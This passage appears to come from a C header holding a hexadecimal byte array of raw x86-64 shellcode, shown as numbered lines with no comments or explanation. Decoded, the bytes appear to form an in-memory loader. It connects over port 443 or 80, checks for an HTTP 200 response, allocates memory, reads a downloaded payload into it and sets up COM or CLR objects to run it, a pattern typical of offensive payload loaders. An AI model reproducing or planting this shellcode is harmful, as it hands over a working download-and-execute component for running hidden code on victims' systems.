107 0x00, 0x48, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xc0,
108 0x48, 0x89, 0x85, 0x08, 0x02, 0x00, 0x00, 0xc7, 0x85, 0xe0, 0x01, 0x00,
109 0x00, 0x00, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x10, 0x02, 0x00, 0x00, 0x00,
110 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
111 0x80, 0xc8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00,
112 0x48, 0x8d, 0x8a, 0x10, 0x05, 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x01,
113 0x00, 0x00, 0x49, 0x89, 0xd1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x10, 0xba,
114 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00,
115 0x00, 0x00, 0x00, 0xe9, 0x5a, 0x04, 0x00, 0x00, 0x8b, 0x85, 0xd4, 0x01,
116 0x00, 0x00, 0x83, 0xf8, 0x04, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89,
117 0x85, 0x74, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00,
118 0x74, 0x0a, 0x81, 0x8d, 0x78, 0x02, 0x00, 0x00, 0x00, 0x30, 0x80, 0x00,
119 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd0, 0x00,
120 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9,
121 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00,
122 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
123 0x85, 0x68, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x68, 0x02, 0x00, 0x00,
124 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xe9, 0x03, 0x00,
125 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xd8,
126 0x00, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00, 0x00, 0x00, 0x74, 0x08,
127 0x41, 0xb8, 0xbb, 0x01, 0x00, 0x00, 0xeb, 0x06, 0x41, 0xb8, 0x50, 0x00,
128 0x00, 0x00, 0x48, 0x8d, 0x95, 0xc0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d,
129 0x68, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00, 0x00,
130 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
131 0x28, 0x03, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00,
132 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
133 0x85, 0x60, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x60, 0x02, 0x00, 0x00,
134 0x00, 0x0f, 0x84, 0xb1, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02,
135 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
136 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8d, 0x92, 0x10, 0x06, 0x00, 0x00, 0x4c,
137 0x8d, 0x45, 0xc0, 0x48, 0x8b, 0x8d, 0x60, 0x02, 0x00, 0x00, 0x48, 0xc7,
138 0x44, 0x24, 0x38, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x78, 0x02, 0x00,
139 0x00, 0x89, 0x54, 0x24, 0x30, 0x48, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x00,
140 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x41,
141 0xb9, 0x00, 0x00, 0x00, 0x00, 0x4c, 0x89, 0xd2, 0xff, 0xd0, 0x48, 0x89,
142 0x85, 0x58, 0x02, 0x00, 0x00, 0x48, 0x83, 0xbd, 0x58, 0x02, 0x00, 0x00,
143 0x00, 0x0f, 0x84, 0x2b, 0x02, 0x00, 0x00, 0x83, 0xbd, 0x74, 0x02, 0x00,
144 0x00, 0x00, 0x74, 0x4f, 0x8b, 0x85, 0x78, 0x02, 0x00, 0x00, 0x25, 0x00,
145 0x10, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x40, 0xc7, 0x85, 0x54, 0x02, 0x00,
146 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0x02, 0x00, 0x00, 0x80,
147 0x33, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
148 0x80, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x3c, 0x02, 0x00, 0x00,
149 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00,
150 0x00, 0x49, 0x89, 0xd0, 0xba, 0x1f, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48,
151 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x00, 0x01, 0x00,
152 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x20,
153 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8,
154 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85,
155 0xc0, 0x0f, 0x84, 0x81, 0x01, 0x00, 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00,
156 0x00, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x30, 0x02, 0x00, 0x00, 0x00,
157 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
158 0x80, 0x08, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x34, 0x02, 0x00, 0x00,
159 0x48, 0x8d, 0x95, 0x30, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02,
160 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x4d,
161 0x89, 0xc1, 0x49, 0x89, 0xd0, 0xba, 0x13, 0x00, 0x00, 0x20, 0xff, 0xd0,
162 0x85, 0xc0, 0x0f, 0x84, 0x2c, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x30, 0x02,
163 0x00, 0x00, 0x3d, 0xc8, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x1b, 0x01, 0x00,
164 0x00, 0xc7, 0x85, 0x34, 0x02, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x48,
165 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0xc7, 0x80, 0x40, 0x07, 0x00,
166 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00,
167 0x48, 0x8b, 0x80, 0x08, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x90, 0x02,
168 0x00, 0x00, 0x4c, 0x8d, 0x82, 0x40, 0x07, 0x00, 0x00, 0x48, 0x8d, 0x95,
169 0x34, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x48,
170 0xc7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x49, 0x89, 0xd1, 0xba,
171 0x05, 0x00, 0x00, 0x20, 0xff, 0xd0, 0x85, 0xc0, 0x0f, 0x84, 0xba, 0x00,
172 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80,
173 0x40, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xa3, 0x00, 0x00,
174 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x48,
175 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07,
176 0x00, 0x00, 0x41, 0xb9, 0x04, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x30,
177 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89, 0xc2,
178 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x89, 0x90, 0x48, 0x07,
179 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80,
180 0x48, 0x07, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x53, 0xc7, 0x85, 0x38,
181 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02,
182 0x00, 0x00, 0x48, 0x8b, 0x80, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95,
183 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92, 0x40, 0x07, 0x00, 0x00, 0x41,
184 0x89, 0xd2, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x92,
185 0x48, 0x07, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x38, 0x02, 0x00, 0x00, 0x48,
186 0x8b, 0x8d, 0x58, 0x02, 0x00, 0x00, 0x4d, 0x89, 0xc1, 0x45, 0x89, 0xd0,
187 0xff, 0xd0, 0x89, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90,
188 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x48, 0x8b,
189 0x95, 0x58, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x8b,
190 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00,
191 0x48, 0x8b, 0x95, 0x60, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0,
192 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xf0, 0x00,
193 0x00, 0x00, 0x48, 0x8b, 0x95, 0x68, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1,
194 0xff, 0xd0, 0x83, 0xbd, 0x7c, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x99,
195 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b,
196 0x80, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89, 0x85, 0x48, 0x02, 0x00, 0x00,
197 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x80, 0x40, 0x07,
198 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x90,
199 0x30, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48,
200 0x05, 0x20, 0x07, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x48, 0x02, 0x00, 0x00,
201 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1, 0xe8, 0x09, 0x35,
202 0x00, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x40,
203 0x28, 0x48, 0x8b, 0x95, 0x90, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x18,
204 0x06, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xca, 0x31, 0x00, 0x00, 0x48,
205 0x89, 0x85, 0x40, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x48, 0x02, 0x00,
206 0x00, 0x48, 0x8b, 0x80, 0x08, 0x19, 0x00, 0x00, 0x48, 0x3b, 0x85, 0x40,
207 0x02, 0x00, 0x00, 0x74, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x06,
208 0x8b, 0x85, 0x7c, 0x02, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x00, 0x03, 0x00,
209 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x70, 0x48,
210 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xc7, 0x45, 0xf4, 0x00, 0x00,
211 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
212 0x10, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x10,
213 0x48, 0x8b, 0x45, 0x10, 0x48, 0x05, 0x48, 0x07, 0x00, 0x00, 0x48, 0x89,
214 0x45, 0xf8, 0xeb, 0x0f, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x48,
215 0x07, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x10, 0x48,
216 0x8b, 0x80, 0x18, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xf7,
217 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x18, 0x01,
218 0x00, 0x00, 0x4c, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81,
219 0xc2, 0x2c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0x10, 0x48, 0x81, 0xc1,
220 0x1c, 0x04, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4,
221 0x00, 0x0f, 0x88, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48,
222 0x8b, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x55,
223 0x18, 0x4c, 0x8d, 0x4a, 0x08, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82,
224 0x3c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x4c, 0x8d, 0x52, 0x04,
225 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x0a, 0x4c, 0x89, 0xd2, 0xff, 0xd0,
226 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x6c, 0x48, 0x8b, 0x45,
227 0x18, 0x48, 0x8b, 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50,
228 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x48, 0x8d, 0x55, 0xc4,
229 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x78, 0x5f, 0x8b,
230 0x45, 0xc4, 0x85, 0xc0, 0x74, 0x58, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
231 0x40, 0x08, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x48, 0x48, 0x8b, 0x55,
232 0x18, 0x4c, 0x8d, 0x4a, 0x10, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x82,
233 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x10, 0x4c, 0x8d, 0x92, 0x4c,
234 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x08, 0x4c,
235 0x89, 0xd2, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0xeb, 0x19, 0x48, 0x8b, 0x45,
236 0x18, 0x48, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x0b, 0x48,
237 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d,
238 0xf4, 0x00, 0x79, 0x43, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x10,
239 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x83, 0xc2, 0x10, 0x48,
240 0x8b, 0x4d, 0x10, 0x4c, 0x8d, 0x81, 0x5c, 0x04, 0x00, 0x00, 0x48, 0x8b,
241 0x4d, 0x10, 0x48, 0x81, 0xc1, 0x4c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x54,
242 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0xba, 0x00, 0x00, 0x00,
243 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83,
244 0x7d, 0xf4, 0x00, 0x79, 0x16, 0x48, 0x8b, 0x45, 0x18, 0x48, 0xc7, 0x40,
245 0x10, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x02,
246 0x02, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48,
247 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x50, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b,
248 0x52, 0x10, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d,
249 0xf4, 0x00, 0x0f, 0x88, 0xd6, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
250 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xf8, 0x48,
251 0x81, 0xc2, 0x04, 0x02, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48,
252 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x10, 0x48,
253 0x8b, 0x00, 0x48, 0x8b, 0x40, 0x60, 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d,
254 0x42, 0x18, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a, 0x10, 0x48, 0x8b,
255 0x55, 0xe0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xff,
256 0xd0, 0x89, 0x45, 0xf4, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0xb8,
257 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x89, 0xd1, 0xff, 0xd0,
258 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b,
259 0x45, 0x18, 0x48, 0x8b, 0x40, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x00,
260 0x48, 0x8b, 0x55, 0x18, 0x4c, 0x8d, 0x42, 0x20, 0x48, 0x8b, 0x55, 0x10,
261 0x4c, 0x8d, 0x8a, 0x6c, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x18, 0x48,
262 0x8b, 0x4a, 0x18, 0x4c, 0x89, 0xca, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83,
263 0x7d, 0xf4, 0x00, 0x0f, 0x88, 0x2d, 0x01, 0x00, 0x00, 0xc7, 0x45, 0xcc,
264 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10,
265 0x19, 0x00, 0x00, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
266 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xc8, 0x49, 0x89, 0xd0,
267 0xba, 0x01, 0x00, 0x00, 0x00, 0xb9, 0x11, 0x00, 0x00, 0x00, 0xff, 0xd0,
268 0x48, 0x89, 0x45, 0xd8, 0x48, 0x83, 0x7d, 0xd8, 0x00, 0x0f, 0x84, 0xeb,
269 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
270 0x45, 0xd8, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x20,
271 0x8b, 0x55, 0xf0, 0x48, 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48,
272 0x8b, 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19,
273 0x00, 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48,
274 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39,
275 0xc2, 0x72, 0xcd, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x40, 0x20, 0x48,
276 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x68, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x55,
277 0x18, 0x4c, 0x8d, 0x42, 0x28, 0x48, 0x8b, 0x55, 0x18, 0x48, 0x8b, 0x4a,
278 0x20, 0x48, 0x8b, 0x55, 0xd8, 0xff, 0xd0, 0x89, 0x45, 0xf4, 0x83, 0x7d,
279 0xf4, 0x00, 0x0f, 0x94, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xec, 0xc7,
280 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x8b,
281 0x40, 0x10, 0x48, 0x89, 0x45, 0xd0, 0xeb, 0x2f, 0x8b, 0x55, 0xf0, 0x48,
282 0x8b, 0x45, 0xd0, 0x48, 0x8d, 0x0c, 0x02, 0x48, 0x8b, 0x55, 0xf8, 0x8b,
283 0x45, 0xf0, 0xc6, 0x84, 0x02, 0x18, 0x19, 0x00, 0x00, 0x00, 0x48, 0x8b,
284 0x55, 0xf8, 0x8b, 0x45, 0xf0, 0x0f, 0xb6, 0x84, 0x02, 0x18, 0x19, 0x00,
285 0x00, 0x88, 0x01, 0x83, 0x45, 0xf0, 0x01, 0x8b, 0x55, 0xf0, 0x48, 0x8b,
286 0x45, 0xf8, 0x48, 0x8b, 0x80, 0x10, 0x19, 0x00, 0x00, 0x48, 0x39, 0xc2,
287 0x72, 0xbe, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x80, 0x98, 0x00, 0x00,
288 0x00, 0x48, 0x8b, 0x55, 0xd8, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x8b, 0x45,
289 0xec, 0x48, 0x83, 0xc4, 0x70, 0x5d, 0xc3, 0x55, 0x53, 0x48, 0x81, 0xec,
290 0x48, 0x01, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00,
291 0x48, 0x89, 0x8d, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x95, 0xe8, 0x00,
292 0x00, 0x00, 0x48, 0xc7, 0x85, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
293 0x00, 0x48, 0xc7, 0x85, 0x88, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
294 0x48, 0xc7, 0x45, 0x10, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x18,
295 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0x20, 0x00, 0x00, 0x00, 0x00,
296 0x66, 0xc7, 0x45, 0xea, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00,
297 0x00, 0x8b, 0x80, 0x0c, 0x05, 0x00, 0x00, 0x83, 0xf8, 0x01, 0x75, 0x16,
298 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x05, 0x48, 0x07, 0x00,
299 0x00, 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0xeb, 0x15, 0x48, 0x8b,
300 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x48, 0x07, 0x00, 0x00,
301 0x48, 0x89, 0x85, 0xb0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00,
302 0x00, 0x00, 0x8b, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x85, 0x1f, 0x03, 0x00,
303 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x28,
304 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8b,
305 0x95, 0xe8, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x42, 0x38, 0x48, 0x8b, 0x95,
306 0xe8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x4a, 0x28, 0x4c, 0x89, 0xc2, 0xff,
307 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00,
308 0x00, 0x00, 0x0f, 0x88, 0xc8, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8,
309 0x00, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b,
310 0x80, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x00, 0x00, 0x00,
311 0x48, 0x8b, 0x4a, 0x38, 0x48, 0x8d, 0x95, 0x88, 0x00, 0x00, 0x00, 0xff,
312 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x83, 0xbd, 0xac, 0x00, 0x00,
313 0x00, 0x00, 0x0f, 0x88, 0x49, 0x05, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
314 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x8b,
315 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x49, 0x89, 0xd0,
316 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xac, 0x00, 0x00,
317 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0xa8,
318 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8d, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8d,
319 0x55, 0xe4, 0x49, 0x89, 0xd0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xff, 0xd0,
320 0x89, 0x85, 0xac, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x8b, 0x45, 0xe0,
321 0x29, 0xc2, 0x89, 0xd0, 0x83, 0xc0, 0x01, 0x89, 0x85, 0x94, 0x00, 0x00,
322 0x00, 0x83, 0xbd, 0x94, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x84, 0x79, 0x01,
323 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80,
324 0x88, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xba, 0x00,
325 0x00, 0x00, 0x00, 0xb9, 0x0c, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
326 0x85, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb0, 0x00, 0x00, 0x00,
327 0x8b, 0x80, 0x04, 0x08, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00,
328 0x00, 0x00, 0x66, 0xc7, 0x45, 0x30, 0x08, 0x20, 0x48, 0x8b, 0x85, 0xe0,
329 0x00, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x8b,
330 0x95, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x92, 0x04, 0x08, 0x00, 0x00, 0x41,
331 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x08, 0x00, 0x00, 0x00,
332 0xff, 0xd0, 0x48, 0x89, 0x45, 0x38, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00,
333 0x00, 0xeb, 0x5b, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00, 0x48, 0x8b,
334 0x98, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x00, 0x00, 0x00,
335 0x48, 0x8b, 0x80, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89, 0xd2,
336 0x48, 0x83, 0xc2, 0x04, 0x48, 0x89, 0xd1, 0x48, 0xc1, 0xe1, 0x09, 0x48,
